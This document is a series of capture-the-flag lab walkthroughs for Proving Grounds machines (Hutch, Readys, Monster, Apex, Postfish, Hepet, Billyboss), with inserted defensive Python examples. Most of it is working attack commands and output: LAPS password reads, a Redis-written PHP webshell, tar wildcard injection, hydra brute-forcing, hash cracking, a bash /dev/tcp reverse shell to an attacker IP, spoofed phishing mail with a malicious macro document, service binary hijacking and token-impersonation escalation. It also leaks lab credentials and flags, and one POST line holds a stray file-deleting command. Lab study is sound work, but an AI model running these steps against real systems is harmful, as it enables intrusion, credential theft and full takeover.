userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132489437036308102
lastLogoff: 0
lastLogon: 132579563744834908
pwdLastSet: 132489417058152751
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnWwQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: fmcsorley
sAMAccountType: 805306368
userPrincipalName: fmcsorley@hutch.offsec
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec
dSCorePropagationData: 20201104053513.0Z
dSCorePropagationData: 16010101000001.0Z
lastLogonTimestamp: 132579563744834908
msDS-SupportedEncryptionTypes: 0
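The finding above (a password left in an account's description, exposed over an anonymous bind) can be hunted across a whole ldapsearch dump. This added example, not part of the original writeup, parses LDIF including the line folding visible above ("Please c" continued as " hange on next login.") and flags free-text attributes that mention a password; SAMPLE_LDIF is constructed, with the first entry mirroring the one shown and the second made up.

```python
#!/usr/bin/env python3
"""Scan ldapsearch (LDIF) output for directory objects whose free-text
attributes appear to carry a password, the way fmcsorley's description
did above. Handles LDIF line folding: ldapsearch wraps long values and
continues them on a line that starts with a single space (RFC 2849).

Added example, not part of the original writeup. SAMPLE_LDIF is constructed;
the first entry mirrors the one shown above, the second is made up.
"""
import base64
import re

# Free-text attributes administrators tend to leave notes in.
SENSITIVE_ATTRS = ("description", "info", "comment")
PASSWORD_HINT = re.compile(r"\b(password|passwd|pwd|pass)\b", re.IGNORECASE)


def unfold_ldif(text):
    """Join continuation lines (leading single space) onto the previous line."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_entries(text):
    """Return a list of {attr_lowercase: [values]} dicts, one per entry.
    Entries end at a blank line or at the next 'dn:' line;
    'attr:: value' is base64 (binary or non-ASCII values such as objectGUID)."""
    entries, current = [], {}
    for line in unfold_ldif(text):
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("dn:") and current:
            entries.append(current)
            current = {}
        attr, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(attr.lower(), []).append(value)
    if current:
        entries.append(current)
    return entries


def find_password_leaks(text):
    """[(sAMAccountName, attribute, value)] for every suspicious free-text value."""
    findings = []
    for entry in parse_entries(text):
        sam = entry.get("samaccountname", ["?"])[0]
        for attr in SENSITIVE_ATTRS:
            for value in entry.get(attr, []):
                if PASSWORD_HINT.search(value):
                    findings.append((sam, attr, value))
    return findings


SAMPLE_LDIF = """\
# Freddy McSorley, Users, hutch.offsec
dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: user
cn: Freddy McSorley
description: Password set to CrabSharkJellyfish192 at user's request. Please c
 hange on next login.
sAMAccountName: fmcsorley
objectGUID:: TxilGIhMVkuei6KplCd8ug==

# constructed second entry with a harmless description
dn: CN=Service Desk,CN=Users,DC=hutch,DC=offsec
description: Shared helpdesk account, owned by IT operations
sAMAccountName: svc_helpdesk
"""

if __name__ == "__main__":
    for sam, attr, value in find_password_leaks(SAMPLE_LDIF):
        print(f"{sam}: {attr} = {value!r}")
```

Running the same scan with an authenticated low-privilege bind, and separately confirming that an anonymous bind cannot read user attributes at all, covers both halves of this finding.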
Initial Access
After collecting data with bloodhound-python, BloodHound shows that the user we hold has ReadLAPSPassword over the DC. Following the referenced article, read the administrator password and obtain a shell over WinRM.
Proof
┌──(kali㉿kali)-[~/oscp/pg/Hutch]
└─$ bloodyAD -u fmcsorley -d hutch.offsec -p CrabSharkJellyfish192 --host 192.168.206.122 get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
distinguishedName: CN=HUTCHDC,OU=Domain Controllers,DC=hutch,DC=offsec
ms-Mcs-AdmPwd: 5Q,C2{Xt&22]+4
ms-Mcs-AdmPwdExpirationTime: 133978075072851905
┌──(kali㉿kali)-[~/oscp/pg/Hutch]
└─$ evil-winrm -u 'administrator' -p '5Q,C2{Xt&22]+4' -i '192.168.206.122'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
hutch\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Readys
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.122.166 | TCP:22,80,6379 |
Web enumeration
The site is WordPress. wpscan shows the Site Editor 1.1.1 plugin, which has an LFI; log poisoning and PHP filter chains do not work here.
Initial Access
Read the Redis password through the LFI. The password is Ready4Redis?
┌──(kali㉿kali)-[~/oscp/pg/Readys]
└─$ curl http://192.168.122.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf > redis.conf
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 61899 0 61899 0 0 202k 0 --:--:-- --:--:-- --:--:-- 203k
┌──(kali㉿kali)-[~/oscp/pg/Readys]
└─$ cat redis.conf | grep -i pass
# 2) No password is configured.
# If the master is password protected (using the "requirepass" configuration
# masterauth <master-password>
# resync is enough, just passing the portion of data the replica missed while
# Require clients to issue AUTH <PASSWORD> before processing any other
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
requirepass Ready4Redis?
Log in to Redis and write the webshell into /dev/shm/ so that PHP can execute it.
┌──(kali㉿kali)-[~/oscp/pg/Readys]
└─$ redis-cli -h 192.168.122.166
192.168.122.166:6379> AUTH Ready4Redis?
OK
192.168.122.166:6379> config set dir /dev/shm/
OK
192.168.122.166:6379> config set dbfilename shell.php
OK
192.168.122.166:6379> set test "<?php system($_GET['cmd']);?>"
OK
192.168.122.166:6379> save
RCE confirmed.
┌──(kali㉿kali)-[~/oscp/pg/Readys]
└─$ curl "http://192.168.122.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/dev/shm/shell.php&cmd=id" --output -
REDIS0009� redis-ver5.0.14�
�edis-bits�@�ctime��Lhused-mem▒
aof-preamble���testuid=1000(alice) gid=1000(alice) groups=1000(alice)
����a� �{"success":true,"data":{"output":[]}}
Proof
┌──(kali㉿kali)-[~/oscp/pg/Readys]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.122.166] 44344
<ite-editor/editor/extensions/pagebuilder/includes$ cd ~
cd ~
alice@readys:/home/alice$ ls
ls
local.txt
alice@readys:/home/alice$ cat local.txt
cat local.txt
29d1f99a096cca8ec9b2256ce644e3f6
alice@readys:/home/alice$
Privilege Escalation – crontab
Abuse the crontab job with wildcard injection so that tar executes exp.sh.
alice@readys:/var/www/html$ cat /etc/crontab
cat /etc/crontab
*/3 * * * * root /usr/local/bin/backup.sh
alice@readys:/var/www/html$ cat /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fi
alice@readys:/var/www/html$ touch -- "--checkpoint=1"
touch -- "--checkpoint=1"
alice@readys:/var/www/html$ echo "chmod +s /bin/bash" > exp.sh
echo "chmod +s /bin/bash" > exp.sh
alice@readys:/var/www/html$ touch -- "--checkpoint-action=exec=bash exp.sh"
touch -- "--checkpoint-action=exec=bash exp.sh"
alice@readys:/var/www/html$
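The backup.sh job above is exploitable because the shell expands `*` into arguments and tar treats the `--checkpoint` names as options. As an added example, not from the original writeup, the block below gives the defender's two pieces: an audit that flags option-shaped names in the directory the job globs, and a backup that never passes file names through a shell. The sample directory is constructed in a temporary location.

```python
#!/usr/bin/env python3
"""Two defensive pieces for the backup.sh cron job above: an audit that flags
the option-shaped file names a shell wildcard would hand to tar, and a backup
that never goes through a shell, so a name like --checkpoint-action=... stays
a file name.

Added example, not from the original writeup. The sample directory is
constructed in a temporary location.
"""
import os
import tarfile
import tempfile


def option_like_names(directory):
    """When a script runs 'tar -cf out.tar *', the shell expands '*' into one
    argument per entry, and tar parses any that start with '-' as options.
    Report such names so the cron job's working directory can be watched."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def safe_backup(src_dir, dest_tar):
    """Archive every entry of src_dir by explicit path (no shell, no glob).
    Returns the member names actually written, read back from the archive."""
    with tarfile.open(dest_tar, "w") as tar:
        for name in sorted(os.listdir(src_dir)):
            tar.add(os.path.join(src_dir, name), arcname=name)
    with tarfile.open(dest_tar, "r") as tar:
        return sorted(tar.getnames())


def make_sample_site():
    """Constructed sample shaped like /var/www/html above: two ordinary files
    plus the two option-shaped names. Contents are placeholders."""
    root = tempfile.mkdtemp(prefix="readys-")
    for name in ("index.php", "exp.sh", "--checkpoint=1",
                 "--checkpoint-action=exec=bash exp.sh"):
        with open(os.path.join(root, name), "w") as f:
            f.write("# placeholder\n")
    return root


if __name__ == "__main__":
    site = make_sample_site()
    print("option-shaped names:", option_like_names(site))
    print("archived:", safe_backup(site, site + ".tar"))
```

In the shell script itself the equivalent fix is to end option parsing before the glob, `tar -cf /opt/backups/website.tar -- *`, so every expanded name is treated as an operand.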
Proof
alice@readys:/var/www/html$ ls -lh /bin/bash
ls -lh /bin/bash
-rwsr-sr-x 1 root root 1.2M Apr 18 2019 /bin/bash
alice@readys:/var/www/html$ /bin/bash -p
/bin/bash -p
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
023982c4b987b120aeffa6d4ede352cc
bash-5.0#
Monster
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.122.180 | TCP:80,135,139,443,445,3389,5040,7680 |
Web enumeration
Directory brute-forcing finds /blog, running Monstra 3.0.4, which has an authenticated RCE. Use cewl to scrape candidate words from the site, then brute-force the admin password with that list; it turns out to be wazowski.
┌──(kali㉿kali)-[~/oscp/pg/Monster]
└─$ cewl http://monster.pg/index.html > list
┌──(kali㉿kali)-[~/oscp/pg/Monster]
└─$ hydra -l admin -P list monster.pg http-post-form "/blog/admin/index.php:login=^USER^&password=^PASS^&login_submit=Log+In:Wrong" -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-13 03:50:53
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 190 login tries (l:1/p:190), ~12 tries per task
[DATA] attacking http-post-form://monster.pg:80/blog/admin/index.php:login=^USER^&password=^PASS^&login_submit=Log+In:Wrong
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to http[s]://monster.pg:80/blog/admin/index.php
[STATUS] attack finished for monster.pg (waiting for children to complete tests)
[VERBOSE] Page redirected to http[s]://monster.pg:80/blog/admin/index.php?id=dashboard
[80][http-post-form] host: monster.pg login: admin password: wazowski
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-13 03:51:15
Initial Access
After logging in, edit the blog theme and replace it with a webshell (see reference).
Proof
┌──(kali㉿kali)-[~/oscp/pg/Monster]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.122.180] 53344
whoami
mike-pc\mike
PS C:\xampp\htdocs\blog> cd ~
PS C:\Users\Mike> type desktop\local.txt
a3dc38ffa696f013f7dcd65332a290be
Privilege Escalation
While transferring files over SMB, mike's NTLM hash is captured and cracked to Mike14.
┌──(kali㉿kali)-[~/oscp/pg/Monster]
└─$ cat hash
Mike::MIKE-PC:aaaaaaaaaaaaaaaa:8df70471d576d77b0fb23b9158c19fba:
┌──(kali㉿kali)-[~/oscp/pg/Monster]
└─$ hashcat -m 5600 hash --show
MIKE::MIKE-PC:aaaaaaaaaaaaaaaa:8df70471d576d77b0fb23b9158c19fba:010100000000000080474cc03adcdb01d95d318659ffa1a300000000010010006a00590059006f004f004c0041006500030010006a00590059006f004f004c004100650002001000740067004d0069006b0045004c00760004001000740067004d0069006b0045004c0076000700080080474cc03adcdb01060004000200000008003000300000000000000000000000002000006b1697aa64514bb88a88537a904a2e212ffe02a1d991aae4f32695b6c1fb678f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003200320038000000000000000000:Mike14
With that password, log in over RDP. readme_en.txt confirms XAMPP version 7.3.10, for which a privilege escalation PoC exists.

Proof
┌──(kali㉿kali)-[~/oscp/pg/Monster]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.122.180] 57745
Windows PowerShell running as user Administrator on MIKE-PC
Copyright (C) Microsoft Corporation. All rights reserved.
whoami
mike-pc\administrator
PS C:\WINDOWS\system32>
Apex
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.122.145 | TCP:80,445,3306 |
smb enumeration
Anonymous SMB login can access the /docs share.
web enumeration
/openemr runs OpenEMR, which has an authenticated RCE. /filemanager runs Responsive FileManager, which has a path traversal.
Initial Access
Use the exploit's path traversal to read OpenEMR's SQL credential config; looking it up shows it is openemr/sites/default/sqlconf.php. Because Responsive FileManager cannot upload PHP, change the exploit to data="path=Documents" and then read the file over SMB.
┌──(kali㉿kali)-[~/oscp/pg/Apex]
└─$ python3 49359 http://192.168.122.145 PHPSESSID=1imr2gc3hi502pe6v89elpq697 /var/www/openemr/sites/default/sqlconf.php
[*] Copy Clipboard
[*] Paste Clipboard
┌──(kali㉿kali)-[~/oscp/pg/Apex]
└─$ smbclient //192.168.122.145/docs -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jun 12 23:12:21 2025
.. D 0 Thu Jun 12 22:55:39 2025
passwd N 1607 Thu Jun 12 23:11:48 2025
sqlconf.php N 639 Thu Jun 12 23:12:21 2025
OpenEMR Success Stories.pdf A 290738 Fri Apr 9 11:47:12 2021
OpenEMR Features.pdf A 490355 Fri Apr 9 11:47:12 2021
16446332 blocks of size 1024. 10835424 blocks available
smb: \>
---
<?php
// OpenEMR
// MySQL Config
$host = 'localhost';
$port = '3306';
$login = 'openemr';
$pass = 'C78maEQUIEuQ';
$dbase = 'openemr';
Log in with the MySQL credentials to get the username and password hash, then crack the hash to the plaintext thedoctor.
MariaDB [openemr]> select username,password from users_secure;
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2a$05$bJcIfCBjN5Fuh0K9qfoe0eRJqMdM49sWvuSGqv84VMMAkLgkK8XnC |
+----------+--------------------------------------------------------------+
1 row in set (0.069 sec)
MariaDB [openemr]>
Run the exploit.
┌──(kali㉿kali)-[~/oscp/pg/Apex]
└─$ python2 45161 http://192.168.122.145/openemr -u admin -p thedoctor -c 'bash -i >& /dev/tcp/192.168.45.228/80 0>&1'
.---. ,---. ,---. .-. .-.,---. ,---.
/ .-. ) | .-.\ | .-' | \| || .-' |\ /|| .-.\
| | |(_)| |-' )| `-. | | || `-. |(\ / || `-'/
| | | | | |--' | .-' | |\ || .-' (_)\/ || (
\ `-' / | | | `--.| | |)|| `--.| \ / || |\ \
)---' /( /( __.'/( (_)/( __.'| |\/| ||_| \)\
(_) (__) (__) (__) (__) '-' '-' (__)
={ P R O J E C T I N S E C U R I T Y }=
Twitter : @Insecurity
Site : insecurity.sh
[$] Authenticating with admin:thedoctor
[$] Injecting payload
Proof
┌──(kali㉿kali)-[~/oscp/pg/Apex/OpenEMR-RCE]
└─$ rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.122.145] 59386
bash: cannot set terminal process group (1402): Inappropriate ioctl for device
bash: no job control in this shell
www-data@APEX:/var/www/openemr/interface/main$ cd ~
cd ~
www-data@APEX:/var/www$ ls
ls
html
openemr
www-data@APEX:/var/www$ cd /home
cd /home
www-data@APEX:/home$ ls
ls
white
www-data@APEX:/home$ cd white
cd white
www-data@APEX:/home/white$ ls
ls
local.txt
www-data@APEX:/home/white$ cat local.txt
cat local.txt
601e0819f26b5258cfa96d45425dc970
Privilege Escalation
Proof
www-data@APEX:/$ su root
su root
Password: thedoctor
root@APEX:/# cat /root/proof.txt
cat /root/proof.txt
454dc757f3649c9acae3516c203e9d65
root@APEX:/#
Postfish
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.137 | TCP:22,25,80,110,143,993,995 |
smtp enumeration
Use a word list collected from the website.
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ cewl http://postfish.off/ > list
Two users are found.
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ smtp-user-enum -M VRFY -U list -D postfish.off -t 192.168.162.137
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... list
Target count ............. 1
Username count ........... 117
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ postfish.off
######## Scan started at Thu Jun 12 08:03:02 2025 #########
192.168.162.137: Sales@postfish.off exists
192.168.162.137: Legal@postfish.off exists
######## Scan completed at Thu Jun 12 08:03:10 2025 #########
2 results.
117 queries in 8 seconds (14.6 queries / sec)
Using the weak password sales/sales, read the mail contents.
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ curl "imap://postfish.off/INBOX;MAILINDEX=1" --user sales:sales
Return-Path: <it@postfish.off>
X-Original-To: sales@postfish.off
Delivered-To: sales@postfish.off
Received: by postfish.off (Postfix, from userid 997)
id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)
Received: from x (localhost [127.0.0.1])
by postfish.off (Postfix) with SMTP id 7712145434
for <sales@postfish.off>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
Subject: ERP Registration Reminder
Message-Id: <20210331131139.7712145434@postfish.off>
Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
From: it@postfish.off
Hi Sales team,
We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system.
Regards,
IT
The site's /team.html shows that the Sales team member is Brian Moore. Use usernamer.py to generate candidate usernames, then verify them over SMTP to find the real one, which is Brian.Moore.
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ python2 ~/tools/usernamer.py -n "Brian Moore" > BrianMoore.test
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ smtp-user-enum -M VRFY -U BrianMoore.test -D postfish.off -t 192.168.162.137
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... BrianMoore.test
Target count ............. 1
Username count ........... 93
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ postfish.off
######## Scan started at Thu Jun 12 08:31:35 2025 #########
192.168.162.137: @postfish.off exists
192.168.162.137: Brian.Moore@postfish.off exists
######## Scan completed at Thu Jun 12 08:31:40 2025 #########
2 results.
93 queries in 5 seconds (18.6 queries / sec)
Initial Access
Send mail to Brian.Moore from IT's address.
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ swaks -f it@postfish.off -t Brian.Moore@postfish.off -h "a" --body "http://192.168.45.228/"
=== Trying postfish.off:25...
=== Connected to postfish.off.
<- 220 postfish.off ESMTP Postfix (Ubuntu)
-> EHLO a
<- 250-postfish.off
<- 250-PIPELINING
<- 250-SIZE 10240000
<- 250-VRFY
<- 250-ETRN
<- 250-STARTTLS
<- 250-ENHANCEDSTATUSCODES
<- 250-8BITMIME
<- 250-DSN
<- 250-SMTPUTF8
<- 250 CHUNKING
-> MAIL FROM:<it@postfish.off>
<- 250 2.1.0 Ok
-> RCPT TO:<Brian.Moore@postfish.off>
<- 250 2.1.5 Ok
-> DATA
<- 354 End data with <CR><LF>.<CR><LF>
-> Date: Thu, 12 Jun 2025 08:44:35 -0400
-> To: Brian.Moore@postfish.off
-> From: it@postfish.off
-> Subject: test Thu, 12 Jun 2025 08:44:35 -0400
-> Message-Id: <20250612084435.1016118@kali>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
->
-> http://192.168.45.228/
->
->
-> .
<- 250 2.0.0 Ok: queued as 85107458F8
-> QUIT
<- 221 2.0.0 Bye
=== Connection closed with remote host.
The reset password EternaLSunshinE arrives.
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.137] 34108
POST / HTTP/1.1
Host: 192.168.45.228
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confifind /var/mail/ -type f ! -name sales -delete_password%3DEternaLSunshinE
Log in with SSH.
Proof
brian.moore@postfish:~$ cat local.txt
72e4ab3b54a1f2ab42dcfef18b63ee9f
brian.moore@postfish:~$
Privilege Escalation
sudo version 1.8.31; use the exploit.
Proof
brian.moore@postfish:~$ python3 exploit_nss.py
# id
uid=0(root) gid=0(root) groups=0(root),8(mail),997(filter),1000(brian.moore)
# cat /root/proof.txt
3cfa5aed38d464cf6b4c6ca82d6ef711
# ^C
Hepet
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.140 | TCP:25,79,105,106,110,135,139,143,443,445,2224,5040,8000,11100,2001,33006 |
web enumeration
Collect the text on the web pages; it may contain credentials.
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ cewl http://192.168.162.140:8000/ > list
imap enumeration
smtp-user-enum finds five users.
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ smtp-user-enum -M VRFY -U list -t 192.168.162.140
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... list
Target count ............. 1
Username count ........... 274
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Thu Jun 12 03:29:59 2025 #########
192.168.162.140: Charlotte exists
192.168.162.140: Magnus exists
192.168.162.140: Agnes exists
192.168.162.140: Jonas exists
192.168.162.140: Martha exists
######## Scan completed at Thu Jun 12 03:30:16 2025 #########
5 results.
274 queries in 17 seconds (16.1 queries / sec)
Put those 5 users into a list and brute-force with hydra.
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ hydra -L users -P list 192.168.162.140 imap
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-12 03:34:59
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1370 login tries (l:5/p:274), ~86 tries per task
[DATA] attacking imap://192.168.162.140:143/
[143][imap] host: 192.168.162.140 login: Jonas password: SicMundusCreatusEst
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-12 03:35:47
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ cat users
Charlotte
Magnus
Agnes
Jonas
Martha
The second mail mentions LibreOffice.
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ curl "imap://192.168.162.140/INBOX;MAILINDEX=2" --user jonas:SicMundusCreatusEst
Received: from spooler by localhost (Mercury/32 v4.62); 19 Oct 2020 12:28:41 -0700
X-Envelope-To: <jonas@localhost>
Return-path: <mailadmin@localhost>
Received: from kali (192.168.118.8) by localhost (Mercury/32 v4.62) with ESMTP ID MG000001;
19 Oct 2020 12:28:40 -0700
Message-ID: <359094.447081105-sendEmail@kali>
From: "mailadmin@localhost" <mailadmin@localhost>
To: "agnes@localhost" <agnes@localhost>
Cc: "jonas@localhost" <jonas@localhost>,
"magnus@localhost" <magnus@localhost>
Subject: Important
Date: Mon, 19 Oct 2020 19:28:39 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-808784.915440814"
X-PMFLAGS: 570949760 0 5 YGWVEUL6.CNM
This is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program.
------MIME delimiter for sendEmail-808784.915440814
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Team,
We will be changing our office suite to LibreOffice. For the moment, all the spreadsheets and documents will be first procesed in the mail server directly to check the compatibility.
I will forward all the documents after checking everything is working okay.
Sorry for the inconveniences.
------MIME delimiter for sendEmail-808784.915440814--
Initial Access
Generate an .ods file with a macro inserted and mail it to mailadmin.
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ python3 ~/tools/MMG-LO/mmg-ods.py windows 192.168.45.228 4444
[+] Payload: windows reverse shell
[+] Creating malicious .ods file
Done.
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ swaks -f jonas@localhost -t mailadmin@localhost -s 192.168.162.140 -h "a" --body "a" --attach @file.ods
=== Trying 192.168.162.140:25...
=== Connected to 192.168.162.140.
<- 220 localhost ESMTP server ready.
-> EHLO a
<- 250-localhost Hello a; ESMTPs are:
<- 250-TIME
<- 250-SIZE 0
<- 250 HELP
-> MAIL FROM:<jonas@localhost>
<- 250 Sender OK - send RCPTs.
-> RCPT TO:<mailadmin@localhost>
<- 250 Recipient OK - send RCPT or DATA.
-> DATA
<- 354 OK, send data, end with CRLF.CRLF
-> Date: Thu, 12 Jun 2025 05:14:20 -0400
-> To: mailadmin@localhost
-> From: jonas@localhost
-> Subject: test Thu, 12 Jun 2025 05:14:20 -0400
-> Message-Id: <20250612051420.910526@kali>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
-> MIME-Version: 1.0
-> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_910526"
->
-> ------=_MIME_BOUNDARY_000_910526
-> Content-Type: text/plain
->
-> a
-> ------=_MIME_BOUNDARY_000_910526
-> Content-Type: application/octet-stream; name="file.ods"
-> Content-Description: file.ods
-> Content-Disposition: attachment; filename="file.ods"
-> Content-Transfer-Encoding: BASE64
->
->
-> ------=_MIME_BOUNDARY_000_910526--
->
->
-> .
<- 250 Data received OK.
-> QUIT
<- 221 localhost Service closing channel.
=== Connection closed with remote host.
Proof
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.140] 50825
whoami
hepet\ela arwel
PS C:\Program Files\LibreOffice\program> cd ~
PS C:\Users\Ela Arwel> type desktop\local.txt
e8c6f0142988b765cb26eec62b29b742
PS C:\Users\Ela Arwel>
Privilege Escalation – service binary hijack
Checking with PowerUp: a service that runs as SYSTEM lives in a folder we have write permission on.
PS C:\Users\Ela Arwel> . .\PowerUp.ps1
PS C:\Users\Ela Arwel> Invoke-AllChecks
ServiceName : VeyonService
Path : C:\Users\Ela Arwel\Veyon\veyon-service.exe
ModifiablePath : @{ModifiablePath=C:\Users\Ela Arwel\Veyon\veyon-service.exe; IdentityReference=HEPET\Ela Arwel;
Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'VeyonService' -Path <HijackPath>
CanRestart : False
Name : VeyonService
Check : Unquoted Service Paths
PS C:\Users\Ela Arwel\Veyon> mv veyon-service.exe veyon-service.exe.bak
PS C:\Users\Ela Arwel\Veyon> cp //192.168.45.228/share/exp.exe .
PS C:\Users\Ela Arwel\Veyon> mv exp.exe veyon-service.exe
PS C:\Users\Ela Arwel\Veyon> shutdown -r -t 0
Proof
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.140] 49668
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>
Billyboss
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.61 | TCP:21,80,135,139,445,5040,8081 |
Web enumeration
Port 8081 runs Sonatype Nexus Repository Manager, which has an authenticated RCE.
Initial Access
In the exploit, set URL, CMD, USERNAME and PASSWORD; the credentials used here are nexus/nexus.
Proof
┌──(kali㉿kali)-[~/oscp/pg/Billyboss]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.61] 49853
whoami
billyboss\nathan
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> cd ~
PS C:\Users\nathan> type desktop\local.txt
10b6ad854ab7587cdc005dd7f0eacd53
PS C:\Users\nathan>
Privilege Escalation – SeImpersonatePrivilege
Use SigmaPotato.exe to change the administrator password, then log in with psexec.
PS C:\Users\nathan> .\SigmaPotato.exe "net user administrator pwn"
[+] Starting Pipe Server...
